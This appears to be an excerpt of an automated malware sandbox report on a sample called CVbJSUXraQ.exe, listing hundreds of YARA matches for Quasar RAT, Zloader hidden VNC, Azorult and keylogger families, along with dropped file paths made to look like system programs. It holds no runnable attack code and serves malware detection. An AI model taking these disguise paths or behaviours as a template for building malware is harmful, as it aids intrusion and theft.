Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C7D800 CreateDesktopA,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,ReleaseDC,lstrcpyA,CloseDesktop,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
